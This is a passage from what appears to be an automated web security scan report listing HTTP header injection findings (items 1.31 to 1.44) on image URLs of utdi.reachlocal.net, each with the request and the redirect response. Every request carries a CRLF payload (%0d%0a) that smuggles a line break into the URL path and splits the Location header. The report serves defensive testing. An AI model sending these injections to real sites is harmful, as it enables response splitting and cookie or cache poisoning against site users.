Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/c530b
d59940e884
/mainpic_blueguy.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/c530b
d59940e884/mainpic_blueg
...[SNIP]...

1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/mainpic_blueheadline.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 111fb%0d%0aa1ffc884fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /111fb%0d%0aa1ffc884fd6/mainpic_blueheadline.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/111fb
a1ffc884fd6
/mainpic_blueheadline.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/111fb
a1ffc884fd6/mainpic_blue
...[SNIP]...

1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ac19a%0d%0a7030fac53e2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ac19a%0d%0a7030fac53e2/navbutton_about-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:40 GMT
Server: Apache
Location: http://utdi.com/ac19a
7030fac53e2
/navbutton_about-ovr.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ac19a
7030fac53e2/navbutton_ab
...[SNIP]...

1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_about.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 564c7%0d%0ae0db7ba9b90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /564c7%0d%0ae0db7ba9b90/navbutton_about.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:41 GMT
Server: Apache
Location: http://utdi.com/564c7
e0db7ba9b90
/navbutton_about.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:33 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/564c7
e0db7ba9b90/navbutton_ab
...[SNIP]...

1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d5ca8%0d%0abf51af5b896 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d5ca8%0d%0abf51af5b896/navbutton_client-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/d5ca8
bf51af5b896
/navbutton_client-ovr.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d5ca8
bf51af5b896/navbutton_cl
...[SNIP]...

1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_client.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 37f02%0d%0ab42a12b1bbf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /37f02%0d%0ab42a12b1bbf/navbutton_client.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:45 GMT
Server: Apache
Location: http://utdi.com/37f02
b42a12b1bbf
/navbutton_client.jpg
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/37f02
b42a12b1bbf/navbutton_cl
...[SNIP]...

1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0e7%0d%0a7c06fd67eb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7f0e7%0d%0a7c06fd67eb5/navbutton_contact-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:34 GMT
Server: Apache
Location: http://utdi.com/7f0e7
7c06fd67eb5
/navbutton_contact-ovr.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:27 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7f0e7
7c06fd67eb5/navbutton_co
...[SNIP]...

1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_contact.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d419b%0d%0a6740deaef7b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d419b%0d%0a6740deaef7b/navbutton_contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:42 GMT
Server: Apache
Location: http://utdi.com/d419b
6740deaef7b
/navbutton_contact.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d419b
6740deaef7b/navbutton_co
...[SNIP]...

1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 355c6%0d%0a88702d4c646 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /355c6%0d%0a88702d4c646/navbutton_products-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/355c6
88702d4c646
/navbutton_products-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:31 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/355c6
88702d4c646/navbutton_pr
...[SNIP]...

1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_products.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 789fe%0d%0a5615b38ed3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /789fe%0d%0a5615b38ed3b/navbutton_products.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/789fe
5615b38ed3b
/navbutton_products.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/789fe
5615b38ed3b/navbutton_pr
...[SNIP]...

1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6907f%0d%0a53622b16624 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6907f%0d%0a53622b16624/navbutton_projects-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:38 GMT
Server: Apache
Location: http://utdi.com/6907f
53622b16624
/navbutton_projects-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/6907f
53622b16624/navbutton_pr
...[SNIP]...

1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_projects.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ad123%0d%0aeb18754afb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ad123%0d%0aeb18754afb7/navbutton_projects.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Location: http://utdi.com/ad123
eb18754afb7
/navbutton_projects.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ad123
eb18754afb7/navbutton_pr
...[SNIP]...

1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services-ovr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4acb8%0d%0ab541b30dd04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4acb8%0d%0ab541b30dd04/navbutton_services-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:37 GMT
Server: Apache
Location: http://utdi.com/4acb8
b541b30dd04
/navbutton_services-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/4acb8
b541b30dd04/navbutton_se
...[SNIP]...

1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/navbutton_services.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 35525%0d%0a72310b3416a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /35525%0d%0a72310b3416a/navbutton_services.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/35525
72310b3416a
/navbutton_services.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/35525
72310b3416a/navbutton_se
...[SNIP]...

1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-avaya.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3b074%0d%0ae845103065b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3b074%0d%0ae845103065b/partner-logos-avaya.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
